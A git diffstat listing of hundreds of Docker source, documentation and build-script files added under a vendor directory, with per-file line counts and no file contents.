.../syntax/vim/ftdetect/dockerfile.vim | 1 + .../contrib/syntax/vim/syntax/dockerfile.vim | 31 + .../docker/contrib/syscall-test/Dockerfile | 15 + .../docker/docker/contrib/syscall-test/acct.c | 16 + .../docker/contrib/syscall-test/exit32.s | 7 + .../docker/docker/contrib/syscall-test/ns.c | 63 + .../docker/docker/contrib/syscall-test/raw.c | 14 + .../docker/contrib/syscall-test/setgid.c | 11 + .../docker/contrib/syscall-test/setuid.c | 11 + .../docker/contrib/syscall-test/socket.c | 30 + 
.../docker/contrib/syscall-test/userns.c | 63 + .../docker/contrib/udev/80-docker.rules | 3 + .../docker/contrib/vagrant-docker/README.md | 50 + .../docker/docker/daemon/apparmor_default.go | 36 + .../daemon/apparmor_default_unsupported.go | 7 + .../docker/docker/daemon/archive.go | 436 + .../docker/docker/daemon/archive_unix.go | 58 + .../docker/docker/daemon/archive_windows.go | 18 + .../github.com/docker/docker/daemon/attach.go | 147 + .../github.com/docker/docker/daemon/auth.go | 13 + .../docker/docker/daemon/bindmount_solaris.go | 5 + .../docker/docker/daemon/bindmount_unix.go | 5 + .../github.com/docker/docker/daemon/cache.go | 254 + .../docker/docker/daemon/caps/utils_unix.go | 131 + .../docker/docker/daemon/changes.go | 31 + .../docker/docker/daemon/checkpoint.go | 110 + .../docker/docker/daemon/cluster.go | 12 + .../docker/docker/daemon/cluster/cluster.go | 1973 +++++ .../daemon/cluster/convert/container.go | 235 + .../docker/daemon/cluster/convert/network.go | 210 + .../docker/daemon/cluster/convert/node.go | 89 + .../docker/daemon/cluster/convert/secret.go | 64 + .../docker/daemon/cluster/convert/service.go | 366 + .../docker/daemon/cluster/convert/swarm.go | 122 + .../docker/daemon/cluster/convert/task.go | 81 + .../docker/daemon/cluster/executor/backend.go | 61 + .../cluster/executor/container/adapter.go | 463 + .../cluster/executor/container/attachment.go | 81 + .../cluster/executor/container/container.go | 598 ++ .../cluster/executor/container/controller.go | 672 ++ .../cluster/executor/container/errors.go | 15 + .../cluster/executor/container/executor.go | 194 + .../cluster/executor/container/health_test.go | 102 + .../cluster/executor/container/validate.go | 39 + .../executor/container/validate_test.go | 141 + .../executor/container/validate_unix_test.go | 8 + .../container/validate_windows_test.go | 8 + .../docker/docker/daemon/cluster/filters.go | 116 + .../docker/docker/daemon/cluster/helpers.go | 108 + .../docker/daemon/cluster/listen_addr.go | 
278 + .../daemon/cluster/listen_addr_linux.go | 91 + .../daemon/cluster/listen_addr_others.go | 9 + .../daemon/cluster/listen_addr_solaris.go | 57 + .../docker/daemon/cluster/provider/network.go | 37 + .../docker/docker/daemon/cluster/secrets.go | 133 + .../github.com/docker/docker/daemon/commit.go | 271 + .../github.com/docker/docker/daemon/config.go | 525 ++ .../docker/daemon/config_common_unix.go | 90 + .../docker/daemon/config_experimental.go | 8 + .../docker/docker/daemon/config_solaris.go | 47 + .../docker/docker/daemon/config_test.go | 229 + .../docker/docker/daemon/config_unix.go | 104 + .../docker/docker/daemon/config_unix_test.go | 80 + .../docker/docker/daemon/config_windows.go | 71 + .../docker/daemon/config_windows_test.go | 59 + .../docker/docker/daemon/container.go | 282 + .../docker/daemon/container_operations.go | 1049 +++ .../daemon/container_operations_solaris.go | 46 + .../daemon/container_operations_unix.go | 281 + .../daemon/container_operations_windows.go | 59 + .../github.com/docker/docker/daemon/create.go | 290 + .../docker/docker/daemon/create_unix.go | 81 + .../docker/docker/daemon/create_windows.go | 80 + .../github.com/docker/docker/daemon/daemon.go | 1321 +++ .../docker/daemon/daemon_experimental.go | 7 + .../docker/docker/daemon/daemon_linux.go | 80 + .../docker/docker/daemon/daemon_linux_test.go | 104 + .../docker/docker/daemon/daemon_solaris.go | 523 ++ .../docker/docker/daemon/daemon_test.go | 627 ++ .../docker/docker/daemon/daemon_unix.go | 1237 +++ .../docker/docker/daemon/daemon_unix_test.go | 283 + .../docker/daemon/daemon_unsupported.go | 5 + .../docker/docker/daemon/daemon_windows.go | 604 ++ .../docker/docker/daemon/debugtrap.go | 62 + .../docker/docker/daemon/debugtrap_unix.go | 33 + .../docker/daemon/debugtrap_unsupported.go | 7 + .../docker/docker/daemon/debugtrap_windows.go | 52 + .../github.com/docker/docker/daemon/delete.go | 168 + .../docker/docker/daemon/delete_test.go | 43 + .../docker/docker/daemon/discovery.go | 
215 + .../docker/docker/daemon/discovery_test.go | 164 + .../docker/docker/daemon/disk_usage.go | 100 + .../github.com/docker/docker/daemon/errors.go | 57 + .../github.com/docker/docker/daemon/events.go | 132 + .../docker/docker/daemon/events/events.go | 158 + .../docker/daemon/events/events_test.go | 275 + .../docker/docker/daemon/events/filter.go | 110 + .../docker/docker/daemon/events/metrics.go | 15 + .../daemon/events/testutils/testutils.go | 76 + .../docker/docker/daemon/events_test.go | 94 + .../github.com/docker/docker/daemon/exec.go | 280 + .../docker/docker/daemon/exec/exec.go | 118 + .../docker/docker/daemon/exec_linux.go | 27 + .../docker/docker/daemon/exec_solaris.go | 11 + .../docker/docker/daemon/exec_windows.go | 14 + .../github.com/docker/docker/daemon/export.go | 60 + .../docker/docker/daemon/getsize_unix.go | 41 + .../docker/daemon/graphdriver/aufs/aufs.go | 669 ++ .../daemon/graphdriver/aufs/aufs_test.go | 802 ++ .../docker/daemon/graphdriver/aufs/dirs.go | 64 + .../docker/daemon/graphdriver/aufs/mount.go | 21 + .../daemon/graphdriver/aufs/mount_linux.go | 7 + .../graphdriver/aufs/mount_unsupported.go | 12 + .../docker/daemon/graphdriver/btrfs/btrfs.go | 530 ++ .../daemon/graphdriver/btrfs/btrfs_test.go | 63 + .../graphdriver/btrfs/dummy_unsupported.go | 3 + .../daemon/graphdriver/btrfs/version.go | 26 + .../daemon/graphdriver/btrfs/version_none.go | 14 + .../daemon/graphdriver/btrfs/version_test.go | 13 + .../docker/daemon/graphdriver/counter.go | 67 + .../daemon/graphdriver/devmapper/README.md | 96 + .../daemon/graphdriver/devmapper/deviceset.go | 2727 ++++++ .../graphdriver/devmapper/devmapper_doc.go | 106 + .../graphdriver/devmapper/devmapper_test.go | 110 + .../daemon/graphdriver/devmapper/driver.go | 231 + .../daemon/graphdriver/devmapper/mount.go | 89 + .../docker/daemon/graphdriver/driver.go | 270 + .../daemon/graphdriver/driver_freebsd.go | 19 + .../docker/daemon/graphdriver/driver_linux.go | 135 + 
.../daemon/graphdriver/driver_solaris.go | 97 + .../daemon/graphdriver/driver_unsupported.go | 15 + .../daemon/graphdriver/driver_windows.go | 14 + .../docker/daemon/graphdriver/fsdiff.go | 169 + .../graphdriver/graphtest/graphbench_unix.go | 259 + .../graphdriver/graphtest/graphtest_unix.go | 358 + .../graphtest/graphtest_windows.go | 1 + .../daemon/graphdriver/graphtest/testutil.go | 342 + .../graphdriver/graphtest/testutil_unix.go | 143 + .../docker/daemon/graphdriver/overlay/copy.go | 174 + .../daemon/graphdriver/overlay/overlay.go | 462 + .../graphdriver/overlay/overlay_test.go | 93 + .../overlay/overlay_unsupported.go | 3 + .../daemon/graphdriver/overlay2/check.go | 79 + .../daemon/graphdriver/overlay2/mount.go | 88 + .../daemon/graphdriver/overlay2/overlay.go | 662 ++ .../graphdriver/overlay2/overlay_test.go | 121 + .../overlay2/overlay_unsupported.go | 3 + .../daemon/graphdriver/overlay2/randomid.go | 80 + .../graphdriver/overlayutils/overlayutils.go | 18 + .../docker/daemon/graphdriver/plugin.go | 43 + .../docker/docker/daemon/graphdriver/proxy.go | 252 + .../daemon/graphdriver/quota/projectquota.go | 339 + .../graphdriver/register/register_aufs.go | 8 + .../graphdriver/register/register_btrfs.go | 8 + .../register/register_devicemapper.go | 8 + .../graphdriver/register/register_overlay.go | 9 + .../graphdriver/register/register_vfs.go | 6 + .../graphdriver/register/register_windows.go | 6 + .../graphdriver/register/register_zfs.go | 8 + .../docker/daemon/graphdriver/vfs/driver.go | 145 + .../docker/daemon/graphdriver/vfs/vfs_test.go | 37 + .../daemon/graphdriver/windows/windows.go | 886 ++ .../docker/daemon/graphdriver/zfs/MAINTAINERS | 2 + .../docker/daemon/graphdriver/zfs/zfs.go | 417 + .../daemon/graphdriver/zfs/zfs_freebsd.go | 38 + .../daemon/graphdriver/zfs/zfs_linux.go | 27 + .../daemon/graphdriver/zfs/zfs_solaris.go | 59 + .../docker/daemon/graphdriver/zfs/zfs_test.go | 35 + .../daemon/graphdriver/zfs/zfs_unsupported.go | 11 + 
.../github.com/docker/docker/daemon/health.go | 341 + .../docker/docker/daemon/health_test.go | 118 + .../github.com/docker/docker/daemon/image.go | 76 + .../docker/docker/daemon/image_delete.go | 412 + .../docker/docker/daemon/image_exporter.go | 25 + .../docker/docker/daemon/image_history.go | 84 + .../docker/docker/daemon/image_inspect.go | 82 + .../docker/docker/daemon/image_pull.go | 149 + .../docker/docker/daemon/image_push.go | 63 + .../docker/docker/daemon/image_tag.go | 37 + .../github.com/docker/docker/daemon/images.go | 331 + .../github.com/docker/docker/daemon/import.go | 135 + .../github.com/docker/docker/daemon/info.go | 180 + .../docker/docker/daemon/info_unix.go | 82 + .../docker/docker/daemon/info_windows.go | 10 + .../docker/daemon/initlayer/setup_solaris.go | 13 + .../docker/daemon/initlayer/setup_unix.go | 69 + .../docker/daemon/initlayer/setup_windows.go | 13 + .../docker/docker/daemon/inspect.go | 264 + .../docker/docker/daemon/inspect_solaris.go | 41 + .../docker/docker/daemon/inspect_unix.go | 92 + .../docker/docker/daemon/inspect_windows.go | 41 + .../github.com/docker/docker/daemon/keys.go | 59 + .../docker/docker/daemon/keys_unsupported.go | 8 + .../github.com/docker/docker/daemon/kill.go | 164 + .../github.com/docker/docker/daemon/links.go | 87 + .../docker/docker/daemon/links/links.go | 141 + .../docker/docker/daemon/links/links_test.go | 213 + .../docker/docker/daemon/links_linux.go | 72 + .../docker/docker/daemon/links_linux_test.go | 98 + .../docker/docker/daemon/links_notlinux.go | 10 + .../github.com/docker/docker/daemon/list.go | 660 ++ .../docker/docker/daemon/list_unix.go | 11 + .../docker/docker/daemon/list_windows.go | 20 + .../docker/docker/daemon/logdrivers_linux.go | 15 + .../docker/daemon/logdrivers_windows.go | 13 + .../daemon/logger/awslogs/cloudwatchlogs.go | 404 + .../logger/awslogs/cloudwatchlogs_test.go | 724 ++ .../logger/awslogs/cwlogsiface_mock_test.go | 77 + .../docker/docker/daemon/logger/context.go | 111 + 
.../docker/docker/daemon/logger/copier.go | 131 + .../docker/daemon/logger/copier_test.go | 296 + .../daemon/logger/etwlogs/etwlogs_windows.go | 170 + .../docker/docker/daemon/logger/factory.go | 104 + .../docker/daemon/logger/fluentd/fluentd.go | 246 + .../daemon/logger/gcplogs/gcplogging.go | 200 + .../docker/docker/daemon/logger/gelf/gelf.go | 209 + .../daemon/logger/gelf/gelf_unsupported.go | 3 + .../docker/daemon/logger/journald/journald.go | 122 + .../daemon/logger/journald/journald_test.go | 23 + .../logger/journald/journald_unsupported.go | 6 + .../docker/daemon/logger/journald/read.go | 401 + .../daemon/logger/journald/read_native.go | 6 + .../logger/journald/read_native_compat.go | 6 + .../logger/journald/read_unsupported.go | 7 + .../daemon/logger/jsonfilelog/jsonfilelog.go | 151 + .../logger/jsonfilelog/jsonfilelog_test.go | 248 + .../docker/daemon/logger/jsonfilelog/read.go | 319 + .../daemon/logger/logentries/logentries.go | 94 + .../docker/docker/daemon/logger/logger.go | 134 + .../docker/daemon/logger/logger_test.go | 26 + .../daemon/logger/loggerutils/log_tag.go | 31 + .../daemon/logger/loggerutils/log_tag_test.go | 47 + .../logger/loggerutils/rotatefilewriter.go | 124 + .../docker/daemon/logger/splunk/splunk.go | 621 ++ .../daemon/logger/splunk/splunk_test.go | 1302 +++ .../logger/splunk/splunkhecmock_test.go | 157 + .../docker/daemon/logger/syslog/syslog.go | 262 + .../daemon/logger/syslog/syslog_test.go | 62 + .../github.com/docker/docker/daemon/logs.go | 142 + .../docker/docker/daemon/logs_test.go | 15 + .../docker/docker/daemon/metrics.go | 42 + .../docker/docker/daemon/monitor.go | 132 + .../docker/docker/daemon/monitor_linux.go | 19 + .../docker/docker/daemon/monitor_solaris.go | 18 + .../docker/docker/daemon/monitor_windows.go | 46 + .../github.com/docker/docker/daemon/mounts.go | 48 + .../github.com/docker/docker/daemon/names.go | 116 + .../docker/docker/daemon/network.go | 498 ++ .../docker/docker/daemon/network/settings.go | 33 + 
.../docker/docker/daemon/oci_linux.go | 790 ++ .../docker/docker/daemon/oci_solaris.go | 188 + .../docker/docker/daemon/oci_windows.go | 122 + .../github.com/docker/docker/daemon/pause.go | 49 + .../github.com/docker/docker/daemon/prune.go | 236 + .../github.com/docker/docker/daemon/rename.go | 122 + .../github.com/docker/docker/daemon/resize.go | 40 + .../docker/docker/daemon/restart.go | 70 + .../github.com/docker/docker/daemon/search.go | 94 + .../docker/docker/daemon/search_test.go | 358 + .../docker/docker/daemon/seccomp_disabled.go | 19 + .../docker/docker/daemon/seccomp_linux.go | 55 + .../docker/daemon/seccomp_unsupported.go | 5 + .../docker/docker/daemon/secrets.go | 36 + .../docker/docker/daemon/secrets_linux.go | 7 + .../docker/daemon/secrets_unsupported.go | 7 + .../docker/docker/daemon/selinux_linux.go | 17 + .../docker/daemon/selinux_unsupported.go | 13 + .../github.com/docker/docker/daemon/start.go | 230 + .../docker/docker/daemon/start_unix.go | 31 + .../docker/docker/daemon/start_windows.go | 205 + .../github.com/docker/docker/daemon/stats.go | 158 + .../docker/docker/daemon/stats_collector.go | 132 + .../docker/daemon/stats_collector_solaris.go | 34 + .../docker/daemon/stats_collector_unix.go | 71 + .../docker/daemon/stats_collector_windows.go | 15 + .../docker/docker/daemon/stats_unix.go | 58 + .../docker/docker/daemon/stats_windows.go | 11 + .../github.com/docker/docker/daemon/stop.go | 83 + .../docker/docker/daemon/top_unix.go | 126 + .../docker/docker/daemon/top_unix_test.go | 76 + .../docker/docker/daemon/top_windows.go | 53 + .../docker/docker/daemon/unpause.go | 38 + .../github.com/docker/docker/daemon/update.go | 92 + .../docker/docker/daemon/update_linux.go | 25 + .../docker/docker/daemon/update_solaris.go | 11 + .../docker/docker/daemon/update_windows.go | 13 + .../docker/docker/daemon/volumes.go | 303 + .../docker/docker/daemon/volumes_unit_test.go | 39 + .../docker/docker/daemon/volumes_unix.go | 219 + 
.../docker/docker/daemon/volumes_windows.go | 47 + .../github.com/docker/docker/daemon/wait.go | 32 + .../docker/docker/daemon/workdir.go | 21 + .../docker/docker/distribution/config.go | 241 + .../docker/docker/distribution/errors.go | 159 + .../fixtures/validate_manifest/bad_manifest | 38 + .../validate_manifest/extra_data_manifest | 46 + .../fixtures/validate_manifest/good_manifest | 38 + .../docker/distribution/metadata/metadata.go | 75 + .../distribution/metadata/v1_id_service.go | 51 + .../metadata/v1_id_service_test.go | 83 + .../metadata/v2_metadata_service.go | 241 + .../metadata/v2_metadata_service_test.go | 115 + .../docker/docker/distribution/pull.go | 200 + .../docker/docker/distribution/pull_v1.go | 368 + .../docker/docker/distribution/pull_v2.go | 878 ++ .../docker/distribution/pull_v2_test.go | 183 + .../docker/distribution/pull_v2_unix.go | 13 + .../docker/distribution/pull_v2_windows.go | 49 + .../docker/docker/distribution/push.go | 186 + .../docker/docker/distribution/push_v1.go | 463 + .../docker/docker/distribution/push_v2.go | 697 ++ .../docker/distribution/push_v2_test.go | 579 ++ .../docker/docker/distribution/registry.go | 156 + .../docker/distribution/registry_unit_test.go | 136 + .../docker/distribution/utils/progress.go | 44 + .../docker/distribution/xfer/download.go | 452 + .../docker/distribution/xfer/download_test.go | 356 + .../docker/distribution/xfer/transfer.go | 401 + .../docker/distribution/xfer/transfer_test.go | 410 + .../docker/docker/distribution/xfer/upload.go | 168 + .../docker/distribution/xfer/upload_test.go | 134 + .../docker/docker/dockerversion/useragent.go | 74 + .../docker/dockerversion/version_lib.go | 16 + .../github.com/docker/docker/docs/README.md | 30 + .../docker/docker/docs/api/v1.18.md | 2156 +++++ .../docker/docker/docs/api/v1.19.md | 2238 +++++ .../docker/docker/docs/api/v1.20.md | 2391 +++++ .../docker/docker/docs/api/v1.21.md | 2969 +++++++ .../docker/docker/docs/api/v1.22.md | 3307 +++++++ 
.../docker/docker/docs/api/v1.23.md | 3424 ++++++++ .../docker/docker/docs/api/v1.24.md | 5316 +++++++++++ .../docker/docker/docs/api/version-history.md | 249 + .../docker/docker/docs/deprecated.md | 286 + .../docker/docker/docs/extend/EBS_volume.md | 164 + .../docker/docker/docs/extend/config.md | 225 + .../extend/images/authz_additional_info.png | Bin 0 -> 45916 bytes .../docker/docs/extend/images/authz_allow.png | Bin 0 -> 33505 bytes .../docs/extend/images/authz_chunked.png | Bin 0 -> 33168 bytes .../extend/images/authz_connection_hijack.png | Bin 0 -> 38780 bytes .../docker/docs/extend/images/authz_deny.png | Bin 0 -> 27099 bytes .../docker/docker/docs/extend/index.md | 222 + .../docker/docs/extend/legacy_plugins.md | 98 + .../docker/docker/docs/extend/plugin_api.md | 196 + .../docs/extend/plugins_authorization.md | 260 + .../docker/docs/extend/plugins_graphdriver.md | 376 + .../docker/docs/extend/plugins_network.md | 77 + .../docker/docs/extend/plugins_volume.md | 276 + .../docker/docker/docs/reference/builder.md | 1746 ++++ .../docs/reference/commandline/attach.md | 131 + .../docs/reference/commandline/build.md | 451 + .../docker/docs/reference/commandline/cli.md | 249 + .../docs/reference/commandline/commit.md | 93 + .../reference/commandline/container_prune.md | 47 + .../docker/docs/reference/commandline/cp.md | 112 + .../docs/reference/commandline/create.md | 211 + .../docs/reference/commandline/deploy.md | 101 + .../docker/docs/reference/commandline/diff.md | 48 + .../reference/commandline/docker_images.gif | Bin 0 -> 35785 bytes .../docs/reference/commandline/dockerd.md | 1364 +++ .../docs/reference/commandline/events.md | 217 + .../docker/docs/reference/commandline/exec.md | 65 + .../docs/reference/commandline/export.md | 43 + .../docs/reference/commandline/history.md | 48 + .../docs/reference/commandline/image_prune.md | 71 + .../docs/reference/commandline/images.md | 304 + .../docs/reference/commandline/import.md | 75 + 
.../docs/reference/commandline/index.md | 178 + .../docker/docs/reference/commandline/info.md | 224 + .../docs/reference/commandline/inspect.md | 102 + .../docker/docs/reference/commandline/kill.md | 34 + .../docker/docs/reference/commandline/load.md | 53 + .../docs/reference/commandline/login.md | 122 + .../docs/reference/commandline/logout.md | 30 + .../docker/docs/reference/commandline/logs.md | 66 + .../docker/docs/reference/commandline/menu.md | 28 + .../reference/commandline/network_connect.md | 100 + .../reference/commandline/network_create.md | 202 + .../commandline/network_disconnect.md | 43 + .../reference/commandline/network_inspect.md | 192 + .../docs/reference/commandline/network_ls.md | 218 + .../reference/commandline/network_prune.md | 45 + .../docs/reference/commandline/network_rm.md | 59 + .../docs/reference/commandline/node_demote.md | 42 + .../reference/commandline/node_inspect.md | 137 + .../docs/reference/commandline/node_ls.md | 130 + .../reference/commandline/node_promote.md | 41 + .../docs/reference/commandline/node_ps.md | 107 + .../docs/reference/commandline/node_rm.md | 73 + .../docs/reference/commandline/node_update.md | 71 + .../docs/reference/commandline/pause.md | 40 + .../reference/commandline/plugin_create.md | 60 + .../reference/commandline/plugin_disable.md | 66 + .../reference/commandline/plugin_enable.md | 65 + .../reference/commandline/plugin_inspect.md | 164 + .../reference/commandline/plugin_install.md | 71 + .../docs/reference/commandline/plugin_ls.md | 53 + .../docs/reference/commandline/plugin_push.md | 50 + .../docs/reference/commandline/plugin_rm.md | 56 + .../docs/reference/commandline/plugin_set.md | 99 + .../reference/commandline/plugin_upgrade.md | 84 + .../docker/docs/reference/commandline/port.md | 41 + .../docker/docs/reference/commandline/ps.md | 384 + .../docker/docs/reference/commandline/pull.md | 252 + .../docker/docs/reference/commandline/push.md | 75 + .../docs/reference/commandline/rename.md | 27 + 
.../docs/reference/commandline/restart.md | 26 + .../docker/docs/reference/commandline/rm.md | 69 + .../docker/docs/reference/commandline/rmi.md | 83 + .../docker/docs/reference/commandline/run.md | 732 ++ .../docker/docs/reference/commandline/save.md | 45 + .../docs/reference/commandline/search.md | 134 + .../reference/commandline/secret_create.md | 90 + .../reference/commandline/secret_inspect.md | 85 + .../docs/reference/commandline/secret_ls.md | 43 + .../docs/reference/commandline/secret_rm.md | 48 + .../reference/commandline/service_create.md | 556 ++ .../reference/commandline/service_inspect.md | 162 + .../reference/commandline/service_logs.md | 77 + .../docs/reference/commandline/service_ls.md | 114 + .../docs/reference/commandline/service_ps.md | 161 + .../docs/reference/commandline/service_rm.md | 55 + .../reference/commandline/service_scale.md | 96 + .../reference/commandline/service_update.md | 181 + .../reference/commandline/stack_deploy.md | 98 + .../docs/reference/commandline/stack_ls.md | 47 + .../docs/reference/commandline/stack_ps.md | 51 + .../docs/reference/commandline/stack_rm.md | 38 + .../reference/commandline/stack_services.md | 70 + .../docs/reference/commandline/start.md | 28 + .../docs/reference/commandline/stats.md | 117 + .../docker/docs/reference/commandline/stop.md | 29 + .../docs/reference/commandline/swarm_init.md | 142 + .../docs/reference/commandline/swarm_join.md | 102 + .../reference/commandline/swarm_join_token.md | 105 + .../docs/reference/commandline/swarm_leave.md | 58 + .../reference/commandline/swarm_unlock.md | 41 + .../reference/commandline/swarm_unlock_key.md | 84 + .../reference/commandline/swarm_update.md | 45 + .../docs/reference/commandline/system_df.md | 76 + .../reference/commandline/system_prune.md | 79 + .../docker/docs/reference/commandline/tag.md | 74 + .../docker/docs/reference/commandline/top.md | 25 + .../docs/reference/commandline/unpause.md | 36 + .../docs/reference/commandline/update.md | 120 + 
.../docs/reference/commandline/version.md | 67 + .../reference/commandline/volume_create.md | 91 + .../reference/commandline/volume_inspect.md | 59 + .../docs/reference/commandline/volume_ls.md | 183 + .../reference/commandline/volume_prune.md | 54 + .../docs/reference/commandline/volume_rm.md | 42 + .../docker/docs/reference/commandline/wait.md | 25 + .../docker/docker/docs/reference/glossary.md | 286 + .../docker/docker/docs/reference/index.md | 21 + .../docker/docker/docs/reference/run.md | 1555 ++++ .../docker/docs/static_files/contributors.png | Bin 0 -> 23100 bytes .../static_files/docker-logo-compressed.png | Bin 0 -> 4972 bytes .../docker/docker/experimental/README.md | 44 + .../docker/experimental/checkpoint-restore.md | 88 + .../experimental/docker-stacks-and-bundles.md | 202 + .../experimental/images/ipvlan-l3.gliffy | 1 + .../docker/experimental/images/ipvlan-l3.png | Bin 0 -> 18260 bytes .../docker/experimental/images/ipvlan-l3.svg | 1 + .../images/ipvlan_l2_simple.gliffy | 1 + .../experimental/images/ipvlan_l2_simple.png | Bin 0 -> 20145 bytes .../experimental/images/ipvlan_l2_simple.svg | 1 + .../images/macvlan-bridge-ipvlan-l2.gliffy | 1 + .../images/macvlan-bridge-ipvlan-l2.png | Bin 0 -> 14527 bytes .../images/macvlan-bridge-ipvlan-l2.svg | 1 + .../images/multi_tenant_8021q_vlans.gliffy | 1 + .../images/multi_tenant_8021q_vlans.png | Bin 0 -> 17879 bytes .../images/multi_tenant_8021q_vlans.svg | 1 + .../images/vlans-deeper-look.gliffy | 1 + .../experimental/images/vlans-deeper-look.png | Bin 0 -> 38837 bytes .../experimental/images/vlans-deeper-look.svg | 1 + .../docker/experimental/vlan-networks.md | 471 + .../docker/hack/Jenkins/W2L/postbuild.sh | 35 + .../docker/docker/hack/Jenkins/W2L/setup.sh | 309 + .../docker/docker/hack/Jenkins/readme.md | 3 + vendor/github.com/docker/docker/hack/dind | 33 + .../docker/hack/dockerfile/binaries-commits | 11 + .../hack/dockerfile/install-binaries.sh | 123 + .../docker/docker/hack/generate-authors.sh | 15 + 
.../docker/hack/generate-swagger-api.sh | 22 + .../github.com/docker/docker/hack/install.sh | 484 + vendor/github.com/docker/docker/hack/make.ps1 | 408 + vendor/github.com/docker/docker/hack/make.sh | 304 + .../docker/docker/hack/make/.binary | 48 + .../docker/docker/hack/make/.binary-setup | 10 + .../docker/docker/hack/make/.build-deb/compat | 1 + .../docker/hack/make/.build-deb/control | 29 + .../.build-deb/docker-engine.bash-completion | 1 + .../.build-deb/docker-engine.docker.default | 1 + .../make/.build-deb/docker-engine.docker.init | 1 + .../.build-deb/docker-engine.docker.upstart | 1 + .../make/.build-deb/docker-engine.install | 12 + .../make/.build-deb/docker-engine.manpages | 1 + .../make/.build-deb/docker-engine.postinst | 20 + .../hack/make/.build-deb/docker-engine.udev | 1 + .../docker/docker/hack/make/.build-deb/docs | 1 + .../docker/docker/hack/make/.build-deb/rules | 55 + .../.build-rpm/docker-engine-selinux.spec | 96 + .../hack/make/.build-rpm/docker-engine.spec | 254 + .../docker/hack/make/.detect-daemon-osarch | 69 + .../docker/docker/hack/make/.ensure-emptyfs | 23 + .../docker/docker/hack/make/.go-autogen | 86 + .../docker/docker/hack/make/.go-autogen.ps1 | 91 + .../hack/make/.integration-daemon-setup | 7 + .../hack/make/.integration-daemon-start | 116 + .../docker/hack/make/.integration-daemon-stop | 27 + .../hack/make/.integration-test-helpers | 79 + .../hack/make/.resources-windows/common.rc | 38 + .../.resources-windows/docker.exe.manifest | 18 + .../hack/make/.resources-windows/docker.ico | Bin 0 -> 370070 bytes .../hack/make/.resources-windows/docker.png | Bin 0 -> 658195 bytes .../hack/make/.resources-windows/docker.rc | 3 + .../hack/make/.resources-windows/dockerd.rc | 4 + .../make/.resources-windows/event_messages.mc | 39 + .../hack/make/.resources-windows/resources.go | 18 + .../docker/docker/hack/make/README.md | 17 + .../github.com/docker/docker/hack/make/binary | 15 + .../docker/docker/hack/make/binary-client | 12 + 
.../docker/docker/hack/make/binary-daemon | 13 + .../docker/docker/hack/make/build-deb | 91 + .../hack/make/build-integration-test-binary | 11 + .../docker/docker/hack/make/build-rpm | 148 + .../docker/docker/hack/make/clean-apt-repo | 43 + .../docker/docker/hack/make/clean-yum-repo | 20 + .../github.com/docker/docker/hack/make/cover | 15 + .../github.com/docker/docker/hack/make/cross | 46 + .../docker/docker/hack/make/dynbinary | 15 + .../docker/docker/hack/make/dynbinary-client | 12 + .../docker/docker/hack/make/dynbinary-daemon | 12 + .../docker/hack/make/generate-index-listing | 74 + .../docker/docker/hack/make/install-binary | 12 + .../docker/hack/make/install-binary-client | 10 + .../docker/hack/make/install-binary-daemon | 16 + .../docker/docker/hack/make/install-script | 63 + .../docker/docker/hack/make/release-deb | 163 + .../docker/docker/hack/make/release-rpm | 71 + vendor/github.com/docker/docker/hack/make/run | 44 + .../docker/docker/hack/make/sign-repos | 65 + .../docker/docker/hack/make/test-deb-install | 71 + .../docker/docker/hack/make/test-docker-py | 20 + .../docker/hack/make/test-install-script | 31 + .../docker/hack/make/test-integration-cli | 28 + .../docker/hack/make/test-integration-shell | 7 + .../docker/docker/hack/make/test-old-apt-repo | 29 + .../docker/docker/hack/make/test-unit | 55 + vendor/github.com/docker/docker/hack/make/tgz | 92 + .../github.com/docker/docker/hack/make/ubuntu | 190 + .../docker/docker/hack/make/update-apt-repo | 70 + vendor/github.com/docker/docker/hack/make/win | 20 + .../github.com/docker/docker/hack/release.sh | 325 + .../docker/hack/validate/.swagger-yamllint | 4 + .../docker/docker/hack/validate/.validate | 30 + .../docker/docker/hack/validate/all | 8 + .../docker/hack/validate/compose-bindata | 28 + .../docker/docker/hack/validate/dco | 55 + .../docker/docker/hack/validate/default | 16 + .../docker/hack/validate/default-seccomp | 28 + .../docker/docker/hack/validate/gofmt | 33 + 
.../docker/docker/hack/validate/lint | 31 + .../docker/docker/hack/validate/pkg-imports | 33 + .../docker/docker/hack/validate/swagger | 13 + .../docker/docker/hack/validate/swagger-gen | 29 + .../docker/docker/hack/validate/test-imports | 38 + .../docker/docker/hack/validate/toml | 31 + .../docker/docker/hack/validate/vendor | 30 + .../docker/docker/hack/validate/vet | 32 + .../github.com/docker/docker/hack/vendor.sh | 15 + vendor/github.com/docker/docker/image/fs.go | 173 + .../github.com/docker/docker/image/fs_test.go | 384 + .../github.com/docker/docker/image/image.go | 150 + .../docker/docker/image/image_test.go | 59 + .../github.com/docker/docker/image/rootfs.go | 44 + .../docker/docker/image/spec/v1.1.md | 637 ++ .../docker/docker/image/spec/v1.2.md | 696 ++ .../github.com/docker/docker/image/spec/v1.md | 573 ++ .../github.com/docker/docker/image/store.go | 295 + .../docker/docker/image/store_test.go | 300 + .../docker/docker/image/tarexport/load.go | 390 + .../docker/docker/image/tarexport/save.go | 355 + .../docker/image/tarexport/tarexport.go | 47 + .../docker/docker/image/v1/imagev1.go | 156 + .../docker/docker/image/v1/imagev1_test.go | 55 + .../docker/integration-cli/benchmark_test.go | 95 + .../docker/integration-cli/check_test.go | 383 + .../docker/docker/integration-cli/daemon.go | 608 ++ .../docker/integration-cli/daemon_swarm.go | 419 + .../integration-cli/daemon_swarm_hack.go | 20 + .../docker/integration-cli/daemon_unix.go | 35 + .../docker/integration-cli/daemon_windows.go | 53 + .../integration-cli/docker_api_attach_test.go | 210 + .../integration-cli/docker_api_auth_test.go | 25 + .../integration-cli/docker_api_build_test.go | 254 + .../docker_api_containers_test.go | 1961 +++++ .../integration-cli/docker_api_create_test.go | 84 + .../integration-cli/docker_api_events_test.go | 73 + .../docker_api_exec_resize_test.go | 103 + .../integration-cli/docker_api_exec_test.go | 198 + .../integration-cli/docker_api_images_test.go | 165 + 
